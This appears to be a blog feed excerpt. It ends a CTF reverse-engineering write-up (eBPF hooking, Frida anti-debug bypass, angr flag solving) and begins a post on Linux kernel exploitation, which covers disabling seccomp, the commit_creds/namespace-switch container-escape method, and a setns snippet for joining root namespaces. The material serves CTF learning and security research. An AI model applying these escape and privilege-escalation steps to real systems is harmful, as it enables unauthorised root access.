  <span class="k">if</span><span class="p">(</span><span class="n">bpf_probe_write_user</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">"</span><span class="se">\xE9\xFB\xFF\xFF\xFF</span><span class="s">"</span><span class="p">,</span> <span class="mi">5</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"error: bpf_probe_write_user</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"success: hooked return address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Executing the binary with the BPF program loaded led to some surprising results (those are the logs of three distinct runs).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hexalinux.bin-5416    [004] ...21 10744.055618: bpf_trace_printk: IP: 0x7f08d2da3034
hexalinux.bin-5416    [004] ...21 10744.055622: bpf_trace_printk: error: bpf_probe_write_user
hexalinux.bin-5418    [009] ...21 10749.195558: bpf_trace_printk: IP: 0x7fd507691034
hexalinux.bin-5418    [009] ...21 10749.195561: bpf_trace_printk: error: bpf_probe_write_user
hexalinux.bin-5420    [004] ...21 10749.614267: bpf_trace_printk: IP: 0x7f4b510b8034
hexalinux.bin-5420    [004] ...21 10749.614270: bpf_trace_printk: error: bpf_probe_write_user
</code></pre></div></div>
<p>First, the code that makes the syscall is not writable (and thus probably not shellcode, because why would anyone bother making their shellcode read-only?). Second, its address changes on each run. Third, the address is pretty large. Replacing the overwrite with sending a SIGSTOP, i.e., <code class="language-plaintext highlighter-rouge">bpf_send_signal(SIGSTOP)</code>, indeed trapped the child, which was doing the write, in an endless loop. I think this is because the signal causes the write to be aborted and a notification to be sent to the parent, which then resumes the child, which in turn restarts the syscall. However, I have not read the relevant kernel code paths, so this is just a guess.</p>

<p>We can now inspect the child’s mappings, and voila, there is a second stage program loaded at <code class="language-plaintext highlighter-rouge">0x800000000</code>, a dynamic loader, and even a libc.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% cat /proc/5523/maps
00200000-00204000 rwxp 00000000 fe:00 3716342                            /home/archie/ctf/hex23/gecko/hexalinux.bin
00a03000-00a08000 rw-p 00003000 fe:00 3716342                            /home/archie/ctf/hex23/gecko/hexalinux.bin
026f4000-02715000 rw-p 00000000 00:00 0                                  [heap]
800000000-800001000 r--p 00000000 00:00 0
800001000-800003000 r-xp 00000000 00:00 0
800003000-800005000 r--p 00000000 00:00 0
800005000-800006000 rw-p 00000000 00:00 0
b00000000-b00001000 r--p 00000000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00001000-b00027000 r-xp 00001000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00027000-b00031000 r--p 00027000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00031000-b00033000 r--p 00031000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00033000-b00035000 rw-p 00033000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
7f335122c000-7f335122e000 rw-p 00000000 00:00 0
7f335122e000-7f3351254000 r--p 00000000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351254000-7f33513ae000 r-xp 00026000 fe:00 2362697                    /usr/lib/libc.so.6
7f33513ae000-7f3351402000 r--p 00180000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351402000-7f3351406000 r--p 001d3000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351406000-7f3351408000 rw-p 001d7000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351408000-7f3351412000 rw-p 00000000 00:00 0
7fff5b6de000-7fff5b6ff000 rw-p 00000000 00:00 0                          [stack]
7fff5b79c000-7fff5b7a0000 r--p 00000000 00:00 0                          [vvar]
7fff5b7a0000-7fff5b7a2000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</code></pre></div></div>
<p>Seems like either the parent or the child unpacked a second stage in the child’s address space, mapped my system’s dynamic linker and then jumped right into its entry point, instructing it to load the second stage - essentially a user-land exec, neat. The <code class="language-plaintext highlighter-rouge">write</code> syscall was thus made using standard libc functions, not shellcode.</p>

<p><a href="https://github.com/vobst/ctf_hxn23_binary_gecko_stage_1_linux/blob/master/memdump.py">Dumping</a> the second stage yields something that <code class="language-plaintext highlighter-rouge">readelf</code> can understand and my disassembler can load, great.</p>

<p>However, before starting to reverse the second stage I wanted to coerce the dynamic linker into loading <a href="https://frida.re/docs/gadget/">frida-gadget</a> for me. That way I could at least do some dynamic analysis to speed up the process (since the child is already being debugged by its parent, attaching gdb is not an option). That said, because the child sanitizes its stack before it is traced by the parent, it should be possible to start it under gdb, skip the check, and detach afterwards. To check that I could get constructor code execution, and to verify my conjecture that the dynamic linker was indeed tasked to load the second stage, I wrote a small library that checks the <a href="https://man7.org/linux/man-pages/man3/getauxval.3.html">auxiliary vector</a> in its constructor, and indeed, it was set up to point at the second stage’s entry point.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/auxv.h&gt;</span><span class="cp">
</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span>
<span class="kt">void</span> <span class="nf">init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"Hello World"</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Client base at 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">getauxval</span><span class="p">(</span><span class="n">AT_ENTRY</span><span class="p">));</span>
  <span class="n">getchar</span><span class="p">();</span>
<span class="p">}</span>
<span class="c1">// Hello World</span>
<span class="c1">// Client base at 0x800001120</span>
</code></pre></div></div>
<p>Reversing the second stage is interesting as it is written under the assumption that it is being debugged by the parent. Thus, it is not surprising that its first instruction is a breakpoint. Again, there are no symbols in this binary, but this time all function calls are made through function pointers, even the call to <code class="language-plaintext highlighter-rouge">__libc_start_main</code> at the entry point.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>800001120  int64_t _start(int64_t arg1, int64_t arg2, int64_t arg3) __noreturn

800001120  90                 nop       // was int3
800001121  0f1efa             nop     edx, edi
800001124  31ed               xor     ebp, ebp  {0x0}
800001126  4989d1             mov     r9, rdx
800001129  5e                 pop     rsi {__return_addr}
80000112a  4889e2             mov     rdx, rsp {arg_8}
80000112d  4883e4f0           and     rsp, 0xfffffffffffffff0
800001131  50                 push    rax {var_8}
800001132  54                 push    rsp {var_8} {var_10}
800001133  4c8d05160f0000     lea     r8, [rel data_800002050]
80000113a  488d0d9f0e0000     lea     rcx, [rel data_800001fe0]
800001141  488d3dc1000000     lea     rdi, [rel main]
800001148  ff15923e0000       call    qword [rel fp___libc_start_main]
</code></pre></div></div>
<p>Presumably those function pointers are resolved by the parent; at least the binary did not contain any relocation information that would have allowed the dynamic linker to do so. Using <code class="language-plaintext highlighter-rouge">frida</code> it was easy to dump the function pointer table and to convert the addresses back to libc symbols.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Interceptor</span><span class="p">.</span><span class="nx">attach</span><span class="p">(</span><span class="nx">Module</span><span class="p">.</span><span class="nx">findExportByName</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="dl">"</span><span class="s2">write</span><span class="dl">"</span><span class="p">),</span> <span class="p">{</span>
  <span class="nx">onEnter</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">vars</span> <span class="o">=</span> <span class="nx">ptr</span><span class="p">(</span><span class="dl">"</span><span class="s2">0x800004f98</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// function pointers start here</span>

    <span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">13</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">,</span> <span class="nx">vars</span> <span class="o">=</span> <span class="nx">vars</span><span class="p">.</span><span class="nx">add</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span> <span class="p">{</span>
      <span class="kd">let</span> <span class="nx">addr</span> <span class="o">=</span> <span class="nx">vars</span><span class="p">.</span><span class="nx">readPointer</span><span class="p">();</span>
      <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">`</span><span class="p">${</span><span class="nx">vars</span><span class="p">}</span><span class="s2">: </span><span class="p">${</span><span class="nx">addr</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">addr</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> -</span><span class="dl">"</span><span class="p">,</span> <span class="nx">DebugSymbol</span><span class="p">.</span><span class="nx">fromAddress</span><span class="p">(</span><span class="nx">addr</span><span class="p">));</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">},</span>
<span class="p">});</span>
</code></pre></div></div>
<p>However, for some weird reason a few of the function pointers did not correspond to exported libc symbols. Checking the corresponding libc offsets led to some pretty awful-looking functions; luckily, cross-references outed them as some sort of SIMD versions of <code class="language-plaintext highlighter-rouge">strlen</code> and <code class="language-plaintext highlighter-rouge">strcpy</code>. This, and the fact that the resolved addresses were already present in dumps taken while the program was stuck in my library’s constructor, led me to question my earlier assumption that the parent was responsible for resolving the addresses, but I didn’t investigate this issue further, time is money.</p>

<p>Anyway, figuring out the symbol issue is not at all useful for solving the challenge, which turned out to be a standard crackme with the key being the correct flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>800001209  int64_t main() __noreturn

800001209      // was int3
800001237      // PTRACE_TRACEME
800001237      if (ptrace(req: 0, pid: 0, addr: 1, data: nullptr) == -1)
800001240          puts(str: "Get out!!")
800001254      else
800001254          void* rax_3 = malloc(n: 0x64)
800001262          void* rax_4 = malloc(n: 0x64)
800001277          printf(fmt: "give me The correct flag: ")
80000128f          scanf(fmt: &amp;fmt_%s, rax_3)
8000012a4          if (strlen(s: rax_3) != 0x3d)
8000012ad              puts(str: "NOOOO R3V3RS3R!")
8000012bb          if (*rax_3 != 0x46)  // F
800001342              label_800001342:
800001342              puts(str: "NOOOO R3V3RS3R!")
8000012ca          else  // L
8000012ca              if (*(rax_3 + 1) != 0x4c)
8000012ca                  goto label_800001342
8000012d9              if (*(rax_3 + 2) != 0x41)  // A
8000012d9                  goto label_800001342
8000012e8              if (*(rax_3 + 3) != 0x47)  // G
8000012e8                  goto label_800001342
8000012f7              if (*(rax_3 + 4) != 0x7b)  // {
8000012f7                  goto label_800001342
800001300              puts(str: "you are getting somewhere!")
800001326              strncpy(dst: rax_4, src: rax_3 + 5, n: strlen(s: rax_3))
800001334              if (*rax_4 != 0x44)  // D
800001fce                  label_800001fce:
800001fce                  puts(str: "NOOOO R3V3RS3R!")
8000013a8              else // the heavy checks come here
8000013a8                  char rdx_8 = *(rax_4 + 3) ^ *(rax_4 + 5) ^ *(rax_4 + 0xb) ^ *(rax_4 + 0xf) ^ *(rax_4 + 0x14) ^ *(rax_4 + 0x16) ^ *(rax_4 + 0x1a)
8000013dc                  if (sx.d(*(rax_4 + 0x2d) ^ rdx_8 ^ *(rax_4 + 0x24)) == zx.d(*(rax_4 + 0x32) == 0x6c))
8000013dc                      goto label_800001fce
800001401                  if (sx.d(*rax_4) - sx.d(*(rax_4 + 3)) != 0xfffffffb)
800001401                      goto label_800001fce
[continues for quite a bit ...]
</code></pre></div></div>
<p>Interestingly, the child was issuing a second “trace me” request, which fails because the child is already being traced, sending execution down the familiar “Get out!” path. There is no easy way to make this request succeed (I guess even if I could get the parent to exit while keeping the child alive, <code class="language-plaintext highlighter-rouge">systemd</code>, which would become the new parent, would not be expecting the request). Anyway, <code class="language-plaintext highlighter-rouge">frida</code> can solve that for us.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Interceptor</span><span class="p">.</span><span class="nx">attach</span><span class="p">(</span><span class="nx">Module</span><span class="p">.</span><span class="nx">findExportByName</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="dl">"</span><span class="s2">ptrace</span><span class="dl">"</span><span class="p">),</span> <span class="p">{</span>
  <span class="nx">onLeave</span><span class="p">(</span><span class="nx">ret</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">ret</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="p">},</span>
<span class="p">})</span>
</code></pre></div></div>
<p>It’s obvious that those constraints are not meant to be solved by hand, and thus I fired up <code class="language-plaintext highlighter-rouge">angr</code> to solve them for me. However, <code class="language-plaintext highlighter-rouge">cle</code>’s default backend uses <code class="language-plaintext highlighter-rouge">pyelftools</code>, which was throwing an exception due to a dynamic tag in a binary without a string table (or something along those lines). Whatever, I already knew that binaryninja was working fine and thus used the experimental binja backend of <code class="language-plaintext highlighter-rouge">cle</code>. From here on it is really just a few lines of code to solve the challenge.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">angr</span>
<span class="kn">import</span> <span class="nn">cle</span>
<span class="kn">from</span> <span class="nn">cle.backends.binja</span> <span class="kn">import</span> <span class="n">BinjaBin</span>

<span class="c1"># use binja as default loader throws exception
</span><span class="n">b</span> <span class="o">=</span> <span class="n">BinjaBin</span><span class="p">(</span>
    <span class="s">"8251_anonymous_dump_0x800000000.bin"</span><span class="p">,</span>
    <span class="nb">open</span><span class="p">(</span><span class="s">"8251_anonymous_dump_0x800000000.bin"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">),</span>
<span class="p">)</span>

<span class="n">l</span> <span class="o">=</span> <span class="n">cle</span><span class="p">.</span><span class="n">Loader</span><span class="p">(</span><span class="n">b</span><span class="p">)</span>

<span class="n">p</span> <span class="o">=</span> <span class="n">angr</span><span class="p">.</span><span class="n">Project</span><span class="p">(</span><span class="n">l</span><span class="p">)</span>

<span class="c1"># start of heavy checks
</span><span class="n">s</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">factory</span><span class="p">.</span><span class="n">blank_state</span><span class="p">(</span><span class="n">addr</span><span class="o">=</span><span class="mh">0x1351</span><span class="p">)</span>

<span class="c1"># [rbp - 8] is ptr to our data +5
</span><span class="n">s</span><span class="p">.</span><span class="n">regs</span><span class="p">.</span><span class="n">rbp</span> <span class="o">=</span> <span class="mh">0x10000</span>
<span class="n">s</span><span class="p">.</span><span class="n">mem</span><span class="p">[</span><span class="n">s</span><span class="p">.</span><span class="n">regs</span><span class="p">.</span><span class="n">rbp</span> <span class="o">-</span> <span class="mi">8</span><span class="p">].</span><span class="n">uint64_t</span> <span class="o">=</span> <span class="mh">0x11000</span>
<span class="n">s</span><span class="p">.</span><span class="n">mem</span><span class="p">[</span><span class="mh">0x11000</span><span class="p">].</span><span class="n">uint8_t</span> <span class="o">=</span> <span class="mh">0x44</span>

<span class="c1"># flag should be printable ascii
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">):</span>
    <span class="n">b</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">memory</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="mh">0x11000</span> <span class="o">+</span> <span class="n">i</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">add_constraints</span><span class="p">(</span><span class="n">b</span> <span class="o">&lt;</span> <span class="mh">0x7f</span><span class="p">,</span> <span class="n">b</span> <span class="o">&gt;=</span> <span class="mh">0x20</span><span class="p">)</span>

<span class="n">sm</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">factory</span><span class="p">.</span><span class="n">simulation_manager</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>

<span class="n">sm</span><span class="p">.</span><span class="n">explore</span><span class="p">(</span><span class="n">find</span> <span class="o">=</span> <span class="mh">0x1fb4</span><span class="p">,</span> <span class="n">avoid</span><span class="o">=</span><span class="p">[</span><span class="mh">0x1fc7</span><span class="p">])</span>
<span class="n">ss</span> <span class="o">=</span> <span class="n">sm</span><span class="p">.</span><span class="n">found</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>

<span class="n">flag</span> <span class="o">=</span> <span class="p">[</span><span class="s">"F"</span><span class="p">,</span> <span class="s">"L"</span><span class="p">,</span> <span class="s">"A"</span><span class="p">,</span> <span class="s">"G"</span><span class="p">,</span> <span class="s">"{"</span><span class="p">]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x64</span><span class="p">):</span>
    <span class="n">c</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">ss</span><span class="p">.</span><span class="n">mem</span><span class="p">[</span><span class="mh">0x11000</span> <span class="o">+</span> <span class="n">i</span><span class="p">].</span><span class="n">uint8_t</span><span class="p">.</span><span class="n">concrete</span><span class="p">)</span>
    <span class="n">flag</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">c</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">flag</span><span class="p">))</span> <span class="c1"># FLAG{DC_I_0h1nk_y0u_mad3_4_B1G_mil3sUPn3_R3V3@S3d_K33p_G01ng}
</span></code></pre></div></div>
<p>Finally, what remains is to validate the flag against the actual binary to make sure that we don’t submit a wrong result.</p>

<h2 id="conclusion">Conclusion</h2>

<p>I’m not doing many reversing challenges and thus this binary had a lot it could teach me. Having designed some challenges myself I can really appreciate the amount of work that must have gone into creating such a handcrafted payload.</p>

<p>Looking back at my solution process, it seems like I spent too much time reversing the binary in a top-down approach. I could maybe have switched to the bottom-up approach, i.e., starting at the <code class="language-plaintext highlighter-rouge">write</code> syscall, a bit earlier. Anyway, I needed at least some of the top-down knowledge to be able to run <code class="language-plaintext highlighter-rouge">frida</code> and to dump the child process. On the other hand, I avoided going down the rabbit hole of reversing the unpacking process statically and in detail.</p>

<p>I’d actually be interested in seeing other solution approaches, but I doubt that there will be many writeups for such a small CTF.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[This year’s Hexacon featured several CTFs hosted by some of the sponsoring companies. This post is a brief writeup of my solution for the stage-one Linux challenge by Binary Gecko, a “[…] provider of comprehensive and specialized cybersecurity solutions to businesses and institutions of all sizes.”, aha.]]></summary></entry><entry><title type="html">Linux S1E3: With IP Control or Arbitrary Read-Write to Root</title><link href="https://blog.eb9f.de/2023/08/12/Linux-S1-E3.html" rel="alternate" type="text/html" title="Linux S1E3: With IP Control or Arbitrary Read-Write to Root" /><published>2023-08-12T00:00:00+00:00</published><updated>2023-08-12T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/08/12/Linux-S1-E3</id><content type="html" xml:base="https://blog.eb9f.de/2023/08/12/Linux-S1-E3.html"><![CDATA[<p><em>Note: This is the third post in a series on Linux heap exploitation. It assumes that you have read the first [<a href="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html">0</a>] and second [<a href="https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html">1</a>] parts. You can experiment with the exploit [<a href="https://github.com/vobst/ctf-corjail-public">2</a>] yourself using the kernel debugging setup [<a href="https://github.com/vobst/like-dbg-fork-public">3</a>] that was published alongside this series.</em></p>

<p>We concluded the previous post with code execution and a read-write primitive. Now it is time to discuss how to use those primitives for privilege escalation to finally obtain the flag. To that end, we will start by looking into the implementation of various process isolation mechanisms, with the goal of learning how to disable them through ROP or arbitrary read-write.</p>

<p><img src="/media/Linux-S3/roadmap_3.jpg" alt="" /></p>

<h2 id="process-isolation">Process Isolation</h2>
<p>In Linux, there is no shortage of ways to limit what a process can do. The most basic ones, like users, groups, and capabilities, are assumed to be familiar to the reader. In the following, we will have a look at a couple of perhaps lesser-known mechanisms. However, be warned that there is more than that; for example, we will not discuss <code class="language-plaintext highlighter-rouge">cgroups</code> at all.</p>

<h3 id="seccomp">Seccomp</h3>
<p>Restricting the set of system calls that a process may issue, or arguments thereof, is a useful way to implement kernel attack surface reduction as well as the principle of least privilege. A process can use the <a href="https://man7.org/linux/man-pages/man2/seccomp.2.html"><code class="language-plaintext highlighter-rouge">seccomp</code></a> system call to operate on its secure computing state. Most notably, it can specify a set of programs, called filters, for the kernel’s BPF virtual machine that are run on each subsequent system call before the kernel invokes the actual syscall handler. Those programs receive the syscall number, arguments, and user-mode instruction pointer as input, and may indicate their decision via the return value [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/seccomp.c#L942">5</a>]. Actions range from simply allowing or denying the syscall to complex operations like delegating the decision to a supervisor process.</p>

<p>Whether or not a process is subjected to syscall filtering when entering the kernel is decided by the <code class="language-plaintext highlighter-rouge">TIF_SECCOMP</code> bit in the <code class="language-plaintext highlighter-rouge">flags</code> of its <a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/include/asm/thread_info.h#L56"><code class="language-plaintext highlighter-rouge">thread_info</code></a> structure, which is embedded into the <code class="language-plaintext highlighter-rouge">task_struct</code> [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/entry/common.c#L57">6</a>]. The same mechanism is also used to, for example, notify a debugger of system calls a traced process performs. Regarding exploitation, this implies that we can disable seccomp enforcement by simply flipping a bit in the <code class="language-plaintext highlighter-rouge">task_struct</code>.</p>

<p>Container runtimes like Docker run processes under a seccomp filter by default [<a href="https://docs.docker.com/engine/security/seccomp/">7</a>]. However, our CTF challenge is using a custom seccomp profile [<a href="https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/blob/master/pwn/corjail/task/chall/seccomp.json">8</a>]. It enables a few system calls blocked by the default profile, like <code class="language-plaintext highlighter-rouge">keyctl</code> and <code class="language-plaintext highlighter-rouge">add_key</code>, which we already made good use of. On the other hand, it is more restrictive in other areas, e.g., it blocks <a href="https://man7.org/linux/man-pages/man7/io_uring.7.html">io-uring</a> and <a href="https://man7.org/linux/man-pages/man7/sysvipc.7.html">System V message queue</a> related system calls. While the former is probably a precautionary attack surface reduction due to the plethora of security vulnerabilities sprawling out of this subsystem [<a href="https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html">9</a>], the latter is clearly targeted at preventing us from using the exploitation techniques evolving around the kernel objects of these syscalls [<a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">10</a>] [<a href="https://www.willsroot.io/2022/01/cve-2022-0185.html">11</a>] [<a href="https://syst3mfailure.io/wall-of-perdition/">12</a>] [<a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">13</a>].</p>

<p>Furthermore, both profiles block the <a href="https://man7.org/linux/man-pages/man2/setns.2.html"><code class="language-plaintext highlighter-rouge">setns</code></a> system call, albeit in slightly different ways. This call allows a process to change its <em>namespace</em> association, which makes for a smooth transition to our next topic.</p>

<h3 id="namespaces">Namespaces</h3>
<p>Namespaces are an abstraction that is wrapped around some global system resources, like filesystem mounts, process IDs, or the system time. For each such resource, every process is part of an instance of a namespace wrapping that resource. This can be used to give different sets of processes the illusion of exclusive access to a resource. You can inspect the namespaces of a process by listing the files in the <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/ns</code> directory. Each file in this directory links directly to the kernel object representing the namespace instance the process is part of. There is one file for each type of namespace [<a href="https://lwn.net/Articles/531114/">14</a>].</p>
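<p>For example, two processes share a namespace exactly when the inode numbers in those symlink targets match. A small sketch of this inspection:</p>

```python
import os

# Each /proc/<pid>/ns entry is a symlink whose target, e.g.
# "mnt:[4026531841]", encodes the namespace type and the inode
# number of the kernel object backing the namespace instance.
def ns_id(pid, ns_type):
    return os.readlink(f"/proc/{pid}/ns/{ns_type}")

for ns in ("mnt", "pid", "net", "uts", "ipc"):
    print(ns, ns_id("self", ns))
```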

<p>Most namespaces have a tree-like structure, and during exploitation, we oftentimes want to change the namespace association of our process to the root namespaces that all others are derived from. In my limited experience, the semantics of namespaces have plenty of intricacies and so does their implementation. Thus, there is ample opportunity for creating weird, unstable system states when performing the wrong set of manipulations during the exploit.</p>

<p>Among public exploits, the agreed-upon strategy seems to be to perform a weird, incomplete, and unstable switch of all (but the user) namespaces of the init task in the exploit process’ PID namespace. ROP exploits perform this step through <code class="language-plaintext highlighter-rouge">switch_task_namespaces(find_task_by_vpid(1), &amp;init_nsproxy)</code>. What this does is make the root namespace objects available to our process under <code class="language-plaintext highlighter-rouge">/proc/1/ns</code>. Afterwards, we can use the <code class="language-plaintext highlighter-rouge">setns</code> system call with those files to let the kernel perform a more thorough switch of our own namespaces. Switching back to the root user namespace happens as a side effect of the call to <code class="language-plaintext highlighter-rouge">commit_creds(prepare_kernel_cred(0))</code> found in those exploits, which also grants full capabilities in this namespace [<a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html">15</a>] [<a href="https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation">16</a>].</p>
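<p>The user space half of this strategy can be sketched as follows; the sketch assumes the kernel-side <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code> call has already happened, so that the root namespaces are visible under <code class="language-plaintext highlighter-rouge">/proc/1/ns</code>:</p>

```python
import ctypes
import os

# setns(2) via the libc wrapper; nstype 0 means "any namespace type".
libc = ctypes.CDLL(None, use_errno=True)

def setns(fd, nstype=0):
    ret = libc.setns(fd, nstype)
    return 0 if ret == 0 else ctypes.get_errno()

def join_root_namespaces(pid=1):
    # Joining these namespaces requires CAP_SYS_ADMIN, which we hold
    # after commit_creds(prepare_kernel_cred(0)) ran in the kernel.
    for ns in ("mnt", "pid", "net", "ipc", "uts", "cgroup"):
        fd = os.open(f"/proc/{pid}/ns/{ns}", os.O_RDONLY)
        err = setns(fd)
        os.close(fd)
        assert err == 0, f"setns({ns}) failed with errno {err}"
```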

<p>Interestingly, Docker by default does <em>not</em> run processes in separate user namespaces, which implies that a switch of namespaces is not necessary [<a href="https://docs.docker.com/engine/security/userns-remap/">17</a>]. However, even if it did, that would require only minimal modifications to our exploit.</p>

<h3 id="linux-security-modules-lsm">Linux Security Modules (LSM)</h3>
<p>Even after disabling seccomp and switching back to the root namespaces with a full set of capabilities, you might still find yourself receiving permission denied errors on some operations. This might be because an LSM is imposing mandatory access control policies on your process.</p>

<p>For example, Docker is by default using AppArmor, mostly to restrict a process’ access to files in procfs and sysfs [<a href="https://docs.docker.com/engine/security/apparmor/">18</a>] [<a href="https://github.com/moby/moby/blob/master/profiles/apparmor/template.go">19</a>]. This might lead to unexpected failures of some exploitation techniques that artificially create Time of Check to Time of Use issues to write to those files, the global versions of which are mounted read-only into the container [<a href="https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/">20</a>].</p>

<p><em>Homework: Use the privilege escalation experimentation setup described below to disable AppArmor.</em></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<p>Before starting to develop the final stage of our exploit, it should be clear where we start from and what it is that we want to achieve.</p>

<p>We already know that our process is running under the challenge’s custom seccomp filter as well as the default Docker AppArmor profile. Furthermore, we can look up that, by default, Docker runs processes in new cgroup, ipc, mnt, net, pid, and uts namespaces. Finally, even though we are part of the root user namespace, we are an unprivileged user without any additional capabilities.</p>

<p>On the other hand, the goal is to read a file in the home directory of the root user, i.e., <code class="language-plaintext highlighter-rouge">/root</code>. Here, absolute filesystem paths are of course with respect to the filesystem root of the root mount namespace, which we are not part of.</p>

<h3 id="development-setup">Development Setup</h3>
<p>I already hinted at the fact that scribbling around in internal kernel structures or hijacking kernel control flow is likely to cause instability or outright crashes when getting things wrong. As those steps usually come pretty late in the exploit flow, it is customary to develop them in isolation, especially if earlier stages of the exploit might fail with some non-negligible probability [<a href="https://www.offensivecon.org/speakers/2023/alex-plaskett-and-cedric-halbronn.html">21</a>].</p>

<p>The setup I used to facilitate easier development of those later stages consists of a user space program [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/test_privesc.c">22</a>] that issues an uncommon system call, and a gdb script [<a href="https://github.com/vobst/like-dbg-fork-public/blob/master/io/scripts/gdb_script_test_privesc.py">23</a>] that waits for it and simulates the privilege escalation. Before the user space program issues the system call it fills CPU registers with flags and other values that function as parameters to the gdb script. For example, one set of parameters might cause the script to write a ROP chain into memory and set the thread up to execute it, while another one might cause it to overwrite the task’s seccomp status.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./build/test_privesc
Usage: ./build/test_privesc [options] -- program [arg...]
Options can be:
   -c  Update credentials
   -m  Update fs context
   -p  Update pid namespace
   -s  Disable seccomp
   -u  Update mount namespace
   -r  Trigger ROP chain
   -f  Fork before exec
   -n  Do setns(/proc/?/ns)
</code></pre></div></div>
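<p>The trigger side of this setup boils down to a few lines. The sketch below uses <code class="language-plaintext highlighter-rouge">getpid</code> as a harmless stand-in for the uncommon system call, and the flag values are made up for illustration; the real helper and the gdb script agree on their own encoding:</p>

```python
import ctypes

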